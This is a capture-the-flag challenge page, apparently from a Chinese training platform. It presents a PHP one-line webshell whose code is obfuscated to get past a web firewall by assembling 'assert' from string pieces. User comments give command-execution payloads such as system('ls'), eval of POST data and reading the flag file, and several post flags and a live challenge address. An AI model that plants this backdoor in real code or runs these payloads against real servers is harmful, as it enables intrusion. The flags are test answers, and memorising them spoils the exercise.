shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7164
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
星空 1年前

?s=eval($_POST["cmd"])

回复 0

15824777912 1年前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

whitenul 1年前

flag{9fd11e2660d3ad1f535e9f1de957424a}

回复 0

InfoSec 1年前

这里的?s=print_r(scandir('./'))是一个GET请求参数,通过GET方式传递给服务器。当服务器执行上述代码时,会调用PHP函数scandir()来列出当前目录下的所有文件和文件夹,并通过print_r()函数将这些目录内容打印输出到页面上。

回复 1

17795946336 1年前

flag{287b3bef4cb9712a82e858a1ad413de8}

回复 0

zh2815 1年前

:114.67.175.224:10266/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)

回复 1

soyotion 1年前

想多了,我以为要上传过狗的一句话木马,原来是上传好了

回复 0

G0 1年前

这题我喜欢

回复 0

yun20231227 1年前

?s=system('ls') 用这个命令,就可以看到flag文件

回复 0
1580155hsg 1年前

?s=system('cat flaga15808abee46a1d5.txt')

回复 2

向云端bugku 1年前

https://blog.csdn.net/weixin_47450099/article/details/139245987?spm=1001.2014.3001.5502 详解

回复 3

WriteUp

image
harry

3 金币

评分(10)

解题动态

IamnotLin 攻破了该题 11小时前
sjjf 攻破了该题 13小时前
harry2025 攻破了该题 15小时前
yyc4088 攻破了该题 15小时前
3240432110 攻破了该题 15小时前
xhonggcc 攻破了该题 18小时前
18996315220 攻破了该题 1天前
3251336856 攻破了该题 1天前
1348931180 攻破了该题 1天前
xjn12 攻破了该题 1天前
771232546 攻破了该题 1天前
BLX123 攻破了该题 2天前
root404 攻破了该题 2天前
homniloquy 攻破了该题 2天前
1293273679 攻破了该题 2天前
liberator 攻破了该题 2天前
Oliver23 攻破了该题 3天前
sdxsdxl 攻破了该题 3天前
lancertyk 攻破了该题 3天前
YANKUYE 攻破了该题 3天前
问题反馈